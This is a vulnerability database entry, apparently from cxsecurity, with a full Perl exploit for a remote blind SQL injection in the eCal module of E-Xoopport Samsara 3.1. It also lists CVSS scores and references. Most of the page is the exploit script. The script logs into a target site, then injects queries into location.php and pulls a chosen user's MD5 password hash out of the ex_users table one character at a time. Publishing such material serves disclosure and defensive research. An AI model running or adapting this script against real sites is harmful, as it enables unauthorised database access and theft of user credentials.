E-Xoopport - Samsara <= 3.1 (eCal module) Remote Blind SQL Injection

2010.09.26
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

#!/usr/bin/perl # [0-Day] E-Xoopport - Samsara <= v3.1 (eCal module) Remote Blind SQL Injection Exploit # Author/s: _mRkZ_, WaRWolFz Crew # Created: 2010.09.12 after 0 days the bug was discovered. # Greetings To: Dante90, Shaddy, StutM, WaRWolFz Crew # Web Site: www.warwolfz.org use strict; use warnings; use LWP::UserAgent; use HTTP::Cookies; use HTTP::Request::Common; $^O eq 'MSWin32' ? system('cls') : system('clear'); print " E-Xoopport - Samsara <= v3.1 (eCal Module) Remote Blind SQL Injection Exploit +---------------------------------------------------+ | Script: E-Xoopport | | Affected versions: 3.1 | | Bug: Remote Blind SQL Injection (eCal module) | | Author/s: _mRkZ_, WaRWolFz Crew | | Greetz: Dante90, Shaddy, StutM, WarWolFz Crew | | Web Site: www.warwolfz.org | +---------------------------------------------------+ | Warn: You must be able to access to 'eCal' Module | +---------------------------------------------------+ \r\n"; if (@ARGV != 4) { print "\r\nUsage: perl expolit_name.pl <VictimeHost> <YourNick> <YourPass> <NickToHack>\r\n"; exit; } my $host = $ARGV[0]; my $usr = $ARGV[1]; my $pwd = $ARGV[2]; my $anickde = $ARGV[3]; my $anick = '0x'.EncHex($anickde); print "[!] Logging In...\r\n"; my %postdata = ( uname => "$usr", pass => "$pwd", op => "login" ); my $cookies = HTTP::Cookies->new( autosave => 1, ); my $ua = LWP::UserAgent->new; $ua->agent("Mozilla 5.0"); $ua->cookie_jar($cookies); my $req = (POST $host."/user.php", \%postdata); my $request = $ua->request($req); my $content = $request->content; if ($content =~ /<h4>Benvenuto su/i) { print "[+] Logged in!\r\n"; } else { print "[-] Fatal Error: username/password incorrect?\r\n"; exit; } print "[!] Checking permissions...\r\n"; $ua = LWP::UserAgent->new; $ua->agent("Mozilla 5.0"); $req = $host."/modules/eCal/location.php?lid=1+AND+1=1"; $ua->cookie_jar($cookies); $request = $ua->get($req); $content = $request->content; if ($content !~ /<b>Eventi nella localit&#224;: <\/b>/ig) { print "[+] Fatal Error: Access denied\r\n"; exit; } else { print "[+] You have permissions\r\n"; } print "[!] Exploiting...\r\n"; my $i = 1; my $pwdchr; while ($i != 33) { my $wn = 47; while (1) { $wn++; my $ua = LWP::UserAgent->new; $ua->agent("Mozilla 5.0"); my $req = $host."/modules/eCal/location.php?lid=1+AND+ascii(substring((SELECT+pass+FROM+ex_users+WHERE+uname=$anick+LIMIT+0,1),$i,1))=$wn"; $ua->cookie_jar($cookies); my $request = $ua->get($req); my $content = $request->content; open LOGZZ, '>lol.html'; print LOGZZ $content; close LOGZZ; if ($content !~ /<b>Eventi nella localit&#224;: <\/b><a href='localleve\.php\?lid='>/ig) { my $cnt = $1; $pwdchr .= chr($wn); $^O eq 'MSWin32' ? system('cls') : system('clear'); PrintChars($anickde, $pwdchr); last; } } $i++; } print "\r\n[!] Exploiting completed!\r\n\r\n"; print "Visit: www.warwolfz.org\r\n\r\n"; sub PrintChars { my $anick1 = $_[0]; my $chars = $_[1]; print " E-Xoopport - Samsara <= v3.1 (eCal module) Remote Blind SQL Injection Exploit +---------------------------------------------------+ | Script: E-Xoopport | | Affected versions: 3.1 | | Bug: Remote Blind SQL Injection (eCal module) | | Author/s: _mRkZ_, WaRWolFz Crew | | Greetz: Dante90, Shaddy, StutM, WarWolFz Crew | | Web Site: www.warwolfz.org | +---------------------------------------------------+ | Warn: You must be able to access to 'eCal' Module | +---------------------------------------------------+ [!] Logging In... [+] Logged in! [!] Checking permissions... [+] You have permissions [!] Exploiting... [+] ".$anick1."'s md5 Password: ".$chars." "; } sub EncHex { my $char = $_[0]; chomp $char; my @trans = unpack("H*", "$char"); return $trans[0]; } #[Unit-X] Vuln-X DB 2010.09.21

References:

http://xforce.iss.net/xforce/xfdb/62017
http://www.exploit-db.com/exploits/15110
http://packetstormsecurity.org/1009-exploits/exoopportecal-sql.txt


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top